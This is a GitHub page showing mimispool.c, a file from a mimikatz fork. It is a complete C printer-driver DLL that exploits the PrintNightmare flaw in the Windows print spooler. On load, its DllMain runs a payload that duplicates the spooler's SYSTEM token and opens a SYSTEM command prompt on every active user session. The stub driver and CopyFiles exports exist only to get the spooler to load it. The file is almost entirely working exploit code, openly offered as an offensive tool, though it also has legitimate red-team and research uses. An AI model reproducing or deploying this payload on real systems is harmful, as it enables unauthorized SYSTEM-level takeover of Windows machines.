forked from gentilkiwi/mimikatz
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmimispool.c
149 lines (129 loc) · 3.71 KB
/
mimispool.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "mimispool.h"
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
UNREFERENCED_PARAMETER(hinstDLL);
UNREFERENCED_PARAMETER(lpReserved);
if (fdwReason == DLL_PROCESS_ATTACH)
{
RunProcessForAll(L"cmd.exe");
}
return TRUE;
}
// PrintNightMare 2.x - via config file and/or "real driver"
VOID APIENTRY DrvResetConfigCache()
{
;
}
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
{
BOOL status = FALSE;
if (dwMode == DRVQUERY_USERMODE)
{
*pcbNeeded = sizeof(DWORD);
if (pBuffer && (cbBuf >= sizeof(DWORD)))
{
status = TRUE;
*(DWORD*)pBuffer = TRUE;
}
SetLastError(ERROR_INSUFFICIENT_BUFFER);
}
else
{
SetLastError(ERROR_INVALID_PARAMETER);
}
return status;
}
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
{
BOOL status = FALSE;
if ((iEngineVersion < 0x20000) || (cj < 0x10))
{
SetLastError(ERROR_BAD_DRIVER_LEVEL);
}
else
{
pded->iDriverVersion = 0x20000;
pded->pdrvfn = NULL;
pded->c = 0;
status = TRUE;
}
return status;
}
VOID APIENTRY DrvDisableDriver()
{
;
}
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
// PrintNightMare 4.x - via CopyFiles
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszDirectory);
UNREFERENCED_PARAMETER(pSplClientInfo);
UNREFERENCED_PARAMETER(dwLevel);
UNREFERENCED_PARAMETER(pszSourceDir);
UNREFERENCED_PARAMETER(pcchSourceDirSize);
UNREFERENCED_PARAMETER(pszTargetDir);
UNREFERENCED_PARAMETER(pcchTargetDirSize);
UNREFERENCED_PARAMETER(dwFlags);
return ERROR_SUCCESS;
}
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
{
UNREFERENCED_PARAMETER(pszPrinterName);
UNREFERENCED_PARAMETER(pszKey);
UNREFERENCED_PARAMETER(dwCopyFileEvent);
return TRUE;
}
// Kiwi payload - SYSTEM on all active desktop(s)
BOOL RunProcessForAll(LPWSTR szProcess)
{
BOOL status = FALSE;
STARTUPINFO si = { 0 };
PROCESS_INFORMATION pi = { 0 };
HANDLE hToken, hNewToken;
DWORD i, count;
LPVOID Environment;
PSESSIONIDW sessions;
si.cb = sizeof(si);
si.lpDesktop = L"winsta0\\default";
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
{
if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
{
if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
{
for (i = 0; i < count; i++)
{
if (sessions[i].State == State_Active)
{
if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
{
if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
}
}
if (sessions)
{
WinStationFreeMemory(sessions);
}
}
DestroyEnvironmentBlock(Environment);
}
CloseHandle(hNewToken);
}
CloseHandle(hToken);
}
return status;
}